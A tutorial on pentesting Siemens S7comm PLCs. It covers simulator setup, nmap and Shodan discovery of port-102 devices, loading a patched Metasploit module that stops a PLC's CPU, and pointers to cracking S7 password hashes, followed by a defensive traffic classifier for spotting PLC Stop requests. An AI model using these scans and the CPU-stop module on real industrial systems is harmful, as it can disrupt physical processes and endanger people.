Pentesting ICS (S7comm)

What is S7comm?

https://gamayan.com/knowledge-base/s7comm/

Siemens S7 PLC simulator

If you want to play around without real hardware, you can install an S7 simulator written in Python (python-snap7 on top of the Snap7 library):

  1. Download snap7-full-x.x.x.zip (https://osdn.net/projects/sfnet_snap7/downloads/1.4.0/snap7-full-1.4.0.zip/)
  2. Unzip with name snap7-full in ~/
  3. Execute the following commands
```bash
$ cd ~/snap7-full
$ sudo apt-get install python-pip
$ sudo -H pip install python-snap7
$ cd build/unix
$ make -f x86_64_linux.mk
$ cd ../bin/x86_64-linux/
$ sudo cp libsnap7.so /usr/lib
$ sudo ldconfig
$ sudo python
```

```python
>>> import snap7
>>> s7server = snap7.server.Server()
>>> s7server.create()
>>> s7server.start()
>>> s7server.get_status()
('SrvRunning', 'S7CpuStatusRun', 0)
>>>
```

Now the simulator is ready!

Scan

Nmap scan (S7comm listens on TCP port 102, ISO-TSAP):

```bash
nmap --script s7-info.nse -p 102 <host/s>
```

Shodan dork: port:102

Scan and identify with plcscan.py:

```bash
# Example usage
plcscan.py 192.168.0.1
plcscan.py --timeout 2 192.168.0.1:102 10.0.0.0/24
plcscan.py --hosts-list hosts.txt
```

Using Nmap with the s7-info.nse script (https://nmap.org/nsedoc/scripts/s7-info.html):

```bash
nmap --script s7-info.nse -p 102 10.0.0.1/24
```

Exploits

There should also be some Metasploit modules; search Exploit-DB for them with searchsploit:

```bash
$ searchsploit Siemens Simatic S7
```

Add exploit 19831.rb to metasploit:

Metasploit comes with a ton of exploits already included; however, this Siemens module needs to be added by hand. As it was written with Metasploit in mind, this is a simple task: first adjust the file as described next, then run the commands that follow on the Kali Linux VM.

To work with a newer Metasploit framework, we need to change some code in the 19831.rb file. Look at line 39:

```ruby
OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),
```

Change the preceding to this:

```ruby
OptInt.new('MODE', [false, 'Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN mode.',1]),
```

Now copy the module to the msf user directory:

```bash
$ cd ~/.msf4/modules/
~/.msf4/modules $ mkdir -p auxiliary/hardware/scada
~/.msf4/modules $ cd auxiliary/hardware/scada
~/.msf4/modules/auxiliary/hardware/scada $ cp /usr/share/exploitdb/platforms/hardware/remote/19831.rb 19831.rb
~/.msf4/modules/auxiliary/hardware/scada $ service postgresql start
~/.msf4/modules/auxiliary/hardware/scada $ msfconsole
```

Now continue in Metasploit:

```
msf > reload_all
msf > search siemens
msf > use auxiliary/hardware/scada/19831
msf auxiliary(19831) > show options
msf auxiliary(19831) > set RHOSTS 172.16.252.134
RHOSTS => 172.16.252.134
msf auxiliary(19831) > exploit
[+] 172.16.252.134 PLC is running, iso-tsap port is open.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
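The scan above fingerprints PLCs on TCP/102, and the module above sends the CPU STOP/RUN request over the same channel. From the defender's side, both are visible on the wire, and a passive monitor can tell a harmless identification read from a state-changing request by looking at the S7comm function code. The following is an added example, not code from the original post, from snap7 or from plcscan.py. It assumes the public TPKT/COTP/S7comm header layout (as dissected by Wireshark); the three sample packets at the bottom are constructed by hand, and the source addresses in them are made up.

```python
"""Passive classifier for S7comm traffic on TCP/102 (ISO-TSAP over TPKT/COTP)."""
import struct

# S7comm function codes found in the parameter block of Job PDUs (ROSCTR 0x01).
S7_FUNCTIONS = {
    0x00: "CPU services", 0x04: "Read Var", 0x05: "Write Var",
    0x1A: "Request download", 0x1B: "Download block", 0x1C: "Download ended",
    0x1D: "Start upload", 0x1E: "Upload", 0x1F: "End upload",
    0x28: "PI-Service (PLC control)", 0x29: "PLC Stop", 0xF0: "Setup communication",
}
# Functions that change PLC state or program logic: an ICS monitor should alert
# on these whenever the source is not a known engineering workstation.
STATE_CHANGING = {0x05, 0x1A, 0x1B, 0x1C, 0x28, 0x29}
ROSCTR = {1: "Job", 2: "Ack", 3: "Ack-Data", 7: "Userdata"}


def _parse_cotp_cr(cotp: bytes) -> dict:
    """COTP Connection Request: fixed part, then TLV parameters (C1/C2 = TSAPs)."""
    rec = {"kind": "cotp-connect", "state_changing": False}
    i = 6  # skip CR code, DST-REF, SRC-REF and the class byte
    while i + 2 <= len(cotp):
        code, n = cotp[i], cotp[i + 1]
        val = cotp[i + 2:i + 2 + n]
        if code == 0xC1:
            rec["calling_tsap"] = val.hex()
        elif code == 0xC2 and len(val) == 2:
            rec["called_tsap"] = val.hex()
            # S7 convention: second TSAP byte is rack (high 3 bits) and slot (low 5 bits)
            rec["rack"], rec["slot"] = val[1] >> 5, val[1] & 0x1F
        i += 2 + n
    return rec


def parse_s7(packet: bytes) -> dict:
    """Parse TPKT -> COTP -> S7comm; raise ValueError for anything else."""
    if len(packet) < 6 or packet[0] != 0x03:
        raise ValueError("not TPKT")
    if struct.unpack(">H", packet[2:4])[0] != len(packet):
        raise ValueError("TPKT length mismatch")
    li = packet[4]                      # COTP length indicator
    cotp = packet[5:5 + li]
    if len(cotp) != li:
        raise ValueError("truncated COTP")
    if cotp[0] == 0xE0:                 # Connection Request: session setup
        return _parse_cotp_cr(cotp)
    if cotp[0] != 0xF0:                 # only Data Transfer carries S7comm
        raise ValueError("unexpected COTP PDU type 0x%02X" % cotp[0])
    s7 = packet[5 + li:]
    if len(s7) < 10 or s7[0] != 0x32:   # S7comm protocol id
        raise ValueError("not S7comm")
    rosctr, _res, pdu_ref, param_len, _data_len = struct.unpack(">BHHHH", s7[1:10])
    hdr = 12 if rosctr == 3 else 10     # Ack-Data has two extra error bytes
    param = s7[hdr:hdr + param_len]
    if len(param) != param_len:
        raise ValueError("truncated parameter block")
    func = param[0] if param else None
    rec = {
        "kind": "s7comm", "rosctr": ROSCTR.get(rosctr, "unknown"),
        "pdu_ref": pdu_ref, "function": func,
        "function_name": S7_FUNCTIONS.get(func, "unknown"),
        "state_changing": rosctr == 1 and func in STATE_CHANGING,
    }
    if func == 0x29 and len(param) >= 7:
        # PLC Stop: 5 fixed bytes, then a length-prefixed PI service name
        n = param[6]
        rec["service"] = param[7:7 + n].decode("ascii", "replace")
    return rec


def alerts(packets):
    """One line per (source, packet); state-changing requests are marked ALERT."""
    out = []
    for src, pkt in packets:
        try:
            rec = parse_s7(pkt)
        except ValueError as err:
            out.append("%s: ignored (%s)" % (src, err))
            continue
        if rec["kind"] == "cotp-connect":
            out.append("%s: new S7 session, called TSAP %s (rack %d slot %d)"
                       % (src, rec.get("called_tsap"), rec.get("rack", -1), rec.get("slot", -1)))
        elif rec["state_changing"]:
            svc = " service=%s" % rec["service"] if "service" in rec else ""
            out.append("%s: ALERT %s pdu_ref=%d%s" % (src, rec["function_name"], rec["pdu_ref"], svc))
        else:
            out.append("%s: %s %s" % (src, rec["rosctr"], rec["function_name"]))
    return out


# Constructed sample packets, as a tap on port 102 would see them (hypothetical sources).
SAMPLES = [
    ("10.0.0.50", bytes.fromhex("0300001611e00000000100c1020100c2020102c0010a")),  # COTP CR to rack 0 slot 2
    ("10.0.0.50", bytes.fromhex("0300001f02f08032010000000b000e0000"
                                "0401120a10020001000184000000")),               # Read Var, DB1 byte 0
    ("10.0.0.99", bytes.fromhex("0300002102f08032010000000a00100000"
                                "29000000000009505f50524f4752414d")),             # PLC Stop "P_PROGRAM"
    ("10.0.0.99", b"GET / HTTP/1.1\r\n"),                                          # not S7 at all
]

if __name__ == "__main__":
    for line in alerts(SAMPLES):
        print(line)
```

Run it as-is to see the four classifications; in practice you would feed `parse_s7` the TCP payloads from a capture and key the alert on source address, so that a STOP from anything other than the engineering station stands out. Note that the module output above ("PLC is running, iso-tsap port is open") corresponds to exactly the session-setup and Job PDUs this parser labels.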

Newer Siemens devices require a password for certain actions. Use s7_password_hashes_extractor.py to extract the hash and crack it online.

Manual exploitation

Intercept the S7comm traffic, then craft and replay packets by hand.

Conclusions

Resources and bibliography:

Good to read:
